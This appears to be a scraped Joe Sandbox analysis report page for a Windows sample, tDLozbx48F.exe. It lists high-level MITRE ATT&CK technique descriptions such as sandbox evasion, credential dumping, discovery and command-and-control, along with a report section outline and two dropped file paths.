Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tDLozbx48F.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

C:\Users\user\AppData\Local\y5aox5pi99\port.dat

Static File Info

General

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
tDLozbx48F.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre